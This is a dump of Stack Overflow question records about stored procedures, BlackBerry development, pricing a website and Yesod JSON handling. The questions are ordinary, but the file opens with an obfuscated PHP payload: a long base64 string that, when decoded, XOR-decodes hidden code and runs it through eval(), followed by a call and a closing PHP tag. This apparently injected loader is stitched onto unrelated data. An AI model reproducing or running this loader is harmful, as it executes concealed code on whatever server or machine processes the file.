TYxOzIzNjsyMjY7MjM1OzE2MTsyNDk7MjM4OzIyNzsyNTA7MjM0OzE2NjsxODA7MTMwOzEzMzsxMzQ7MjMzOzE2MTsyMzY7MjI2OzIzNTsyMDg7MjM0OzIyNTsyMzY7MTYxOzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzIyNzsxODA7MTMwOzEzMzsxMzQ7MjMzOzE2MTsyMzY7MjI2OzIzNTsxNjE7MjQ5OzIzODsyMjc7MjUwOzIzNDsxNzg7MTczOzE3MzsxODA7MTMwOzEzMzsxMzQ7MjMzOzE2MTsyMzQ7MjI1OzIzNjsxNjE7MjQ5OzIzODsyMjc7MjUwOzIzNDsxNzg7MTkwOzE4MDsxMzA7MTMzOzEzNDsyMzM7MTYxOzI1MjsyNTA7MjM3OzIyNjsyMzA7MjUxOzE2NzsxNjY7MTgwOzEzMDsxMzM7MjQyOzEzMDsxMzM7MTYwOzE2MDsxNjI7MTYyOzE3NzsxNzk7MTYwOzI1MjsyMzY7MjUzOzIzMDsyNTU7MjUxOzE3NzsxMzA7MTMzOzEzNDsxNzk7MTc2OzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyMzM7MjI0OzI1MzsyMjY7MTc1OzIyNjsyMzQ7MjUxOzIzMTsyMjQ7MjM1OzE3ODsyNTU7MjI0OzI1MjsyNTE7MTc1OzIzODsyMzY7MjUxOzIzMDsyMjQ7MjI1OzE3ODsxNjg7MTY4OzE3NTsyMjQ7MjI1OzIyMDsyNTA7MjM3OzIyNjsyMzA7MjUxOzE3ODsxNjg7MjM0OzIyNTsyMzY7MjI0OzIzNTsyMzQ7MTk4OzI1MTsxNjc7MjUxOzIzMTsyMzA7MjUyOzE2NjsxODA7MjUzOzIzNDsyNTE7MjUwOzI1MzsyMjU7MTc1OzIzMzsyMzg7MjI3OzI1MjsyMzQ7MTgwOzE2ODsxNzc7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMwOzIyNTsyNTU7MjUwOzI1MTsxNzU7MjUxOzI0NjsyNTU7MjM0OzE3ODsyNTE7MjM0OzI0NzsyNTE7MTc1OzIyNTsyMzg7MjI2OzIzNDsxNzg7MjM2OzIyNjsyMzU7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzIxMTsxNzM7MTczOzE2MTsyNTI7MjUxOzI1MzsyMDg7MjUzOzIzNDsyNTU7MjI3OzIzODsyMzY7MjM0OzE2NzsxNzM7MjExOzE3MzsxNzM7MTYzOzE3MzsxNjk7MjU0OzI1MDsyMjQ7MjUxOzE4MDsxNzM7MTYzOzE3MTsyMzY7MjI2OzIzNTsxNjY7MTYxOzE3MzsyMTE7MTczOzE3NTsyNTI7MjMwOzI0NTsyMzQ7MTc4OzE5MDsxODY7MTkxOzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyMzA7MjI1OzI1NTsyNTA7MjUxOzE3NTsyNTE7MjQ2OzI1NTsyMzQ7MTc4OzIzMTsyMzA7MjM1OzIzNTsyMzQ7MjI1OzE3NTsyMjU7MjM4OzIyNjsyMzQ7MTc4OzIzNDsyMjU7MjM2OzE3NTsyNDk7MjM4OzIyNzsyNTA7MjM0OzE3ODsxNjg7MTkxOzE2ODsxNzc7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMwOzIyNTsyNTU7MjUwOzI1MTsxNzU7MjUxOzI0NjsyNTU7MjM0OzE3ODsyMzE7MjMwOzIzNTsyMzU7MjM0OzIyNTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyMzY7MjI2OzIzNTsyMDg7MjM0OzIyNTsyMzY7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzE2ODsxNjg7MTc3OzE3MzsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MTc5OzIzMDsyMjU7MjU1OzI1MDsyNTE7MTc1OzI1MTsyNDY7MjU1OzIzNDsxNzg7MjUyOzI1MDsyMzc7MjI2OzIzMDsyNTE7MTc1OzIyNTsyMzg7MjI2OzIzNDsxNzg7MjA1OzIwODsyMjA7MjE4OzIwNTsxOTQ7MTk4OzIxOTsxNzU7MjQ5OzIzODsyMjc7MjUwOzIzNDsxNzg7MTY4OzIwMDsyMjQ7MTY4OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsxNjA7MjMzOzIyNDsyNTM7MjI2OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzE7MjM2OzIyNjsyMzU7MTc1OzE3NDsxNzg7MTc1OzE3MzsxNzM7MTY2OzE3NTsyNDQ7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyNTU7MjUzOzIzNDsxNzc7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTcxOzIzNjsyMjY7MjM1OzE3ODsyNTI7MjUxOzI1MzsyMzA7MjU1OzI1MjsyMjc7MjM4OzI1MjsyMzE7MjM0OzI1MjsxNjc7MTcxOzIzNjsyMjY7MjM1OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzIwMjsyNDc7MjM0OzIzNjsyNTA7MjUxOzIzMDsyMjU7MjMyOzE3NTsxNzE7MjM2OzIyNjsyMzU7MTc1OzIxMTsyMjU7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsyMjY7MjQ2OzI1MjsyMzE7MjM0OzIyNzsyMjc7MjM0OzI0NzsyMzQ7MjM2OzE2NzsxNzM7MTcxOzIzNjsyMjY7MjM1OzE3MzsxNjY7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MTYwOzI1NTsyNTM7MjM0OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjQ3OzIzMDsyNTE7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzI0MjsxMzA7MTMzOzI0MjsxNzU7Iik7JHo9IiI7Zm9yZWFjaCgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?>
3
8,516,088
12/15/2011 06:41:56
1,069,457
11/28/2011 13:57:39
71
2
When to use a stored procedure mysql
I have a lot of common queries that I have to execute in my web application. Is it better to write stored procedures? Or is it better to make a class and define functions with normal SQL that return the same data set? I'm asking this because stored procedures are new to me.
mysql
sql
stored-procedures
null
null
12/15/2011 21:11:37
not constructive
When to use a stored procedure mysql === I have a lot of common queries that I have to execute in my web application. Is it better to write stored procedures? Or is it better to make a class and define functions with normal SQL that return the same data set? I'm asking this because stored procedures are new to me.
4
1,096,531
07/08/2009 07:07:53
131,062
06/30/2009 13:04:43
1
0
How to start Blackberry Programming?
for the past one month i am working on Android,and now i have to work on Blackberry.I don't know how to start it.so please guide me and provide some links to learn Blackberry.
blackberry
null
null
null
null
06/02/2012 15:01:50
not constructive
How to start Blackberry Programming? === for the past one month i am working on Android,and now i have to work on Blackberry.I don't know how to start it.so please guide me and provide some links to learn Blackberry.
4
27,712
08/26/2008 10:31:53
214
08/03/2008 15:12:30
247
24
What to charge for a simple website
A friend of a friend has asked me to build a very simple site (a few static pages and a forum which would be setting up and theming an existing forum technology) but I'm not sure what to charge. What do people think would be appropriate?
website
charges
null
null
null
05/06/2012 23:06:41
not constructive
What to charge for a simple website === A friend of a friend has asked me to build a very simple site (a few static pages and a forum which would be setting up and theming an existing forum technology) but I'm not sure what to charge. What do people think would be appropriate?
4
8,272,068
11/25/2011 16:50:55
1,063,256
11/24/2011 05:22:42
14
0
Json toHtml instance or like
Is there some way in yesod-0.9.3 to convert Json to Html to include it into <script/> tag? Using Yesod.Json and Data.Aeson I can get a value of Json type, which I want to use as the value of a variable introduced in a <script> tag, that is, not to return RepJson, but include it as a part of RepHtml. Now instead I need to write this value by hands. P.S. Note to those who know what are JSON and HTML but don't know what is yesod: please don't fix the capitalization and add json and html tags. Json and JSON are not the same, and the question has very little to JSON and HTML. Just skip the question and proceed to those where you know what all the words mean.
haskell
yesod
null
null
null
null
open
Json toHtml instance or like === Is there some way in yesod-0.9.3 to convert Json to Html to include it into <script/> tag? Using Yesod.Json and Data.Aeson I can get a value of Json type, which I want to use as the value of a variable introduced in a <script> tag, that is, not to return RepJson, but include it as a part of RepHtml. Now instead I need to write this value by hands. P.S. Note to those who know what are JSON and HTML but don't know what is yesod: please don't fix the capitalization and add json and html tags. Json and JSON are not the same, and the question has very little to JSON and HTML. Just skip the question and proceed to those where you know what all the words mean.
0